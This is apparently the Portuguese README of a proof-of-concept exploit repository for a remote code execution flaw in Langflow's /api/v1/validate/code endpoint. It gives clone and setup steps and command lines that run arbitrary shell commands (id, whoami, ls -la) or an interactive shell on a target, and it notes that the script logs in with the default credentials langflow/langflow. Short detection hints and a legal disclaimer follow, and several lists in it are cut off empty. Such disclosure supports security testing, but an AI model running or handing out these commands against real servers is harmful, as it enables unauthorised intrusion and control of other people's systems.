
Langflow Remote Code Execution (RCE) Prova de Conceito
Vulnerabilidade de Execução Remota de Código no Langflow
Esta vulnerabilidade afeta:
Langflow
CVE-2026-0770 é uma vulnerabilidade de Execução Remota de Código (RCE) no endpoint:
/api/v1/validate/code
Quando AUTO_LOGIN=true e as credenciais padrão estão habilitadas, os atacantes podem:
O problema decorre da avaliação insegura de código Python durante a validação.
git clone https://github.com/0xgh057r3c0n/CVE-2026-0770.git
cd CVE-2026-0770
Certifique-se de que o Python 3.8+ esteja instalado.
Instale as dependências:
pip install requests colorama
python3 -m venv venv
source venv/bin/activate # Linux / macOS
venv\Scripts\activate # Windows
pip install requests colorama
Inicie a execução remota de comandos interativa:
python3 CVE-2026-0770.py -t http://target:7860
Exemplo:
python3 CVE-2026-0770.py -t http://192.168.1.100:7860
python3 CVE-2026-0770.py -t http://target:7860 -c "id"
Exemplo:
python3 CVE-2026-0770.py -t http://localhost:7860 -c "whoami"
python3 CVE-2026-0770.py -t http://target:7860 -c "ls -la" -v
Exibe saída detalhada de depuração.
python3 CVE-2026-0770.py -t http://target:7860 -k "your.jwt.token"
Se nenhum token for fornecido, o script tenta o login automático usando:
username: langflow
password: langflow
Se bem-sucedido, ele recupera um access_token e prossegue.
Os administradores devem:
AUTO_LOGIN/api/v1/validate/codeMonitore:
Requisições POST suspeitas para /api/v1/validate/code
Código contendo:
__import__subprocessthrow(Exception(Tentativas repetidas de login usando credenciais padrão
.
├── CVE-2026-0770.py
├── LICENSE
└── README.md
0xgh057r3c0n 🔗 https://github.com/0xgh057r3c0n
Pesquisador de Segurança | Desenvolvedor de Exploits | Escritor de PoC
Distribuído sob a Licença MIT. Veja a licença completa aqui:
Este projeto destina-se a:
O uso não autorizado contra sistemas que você não possui ou sem permissão explícita para testar é ilegal.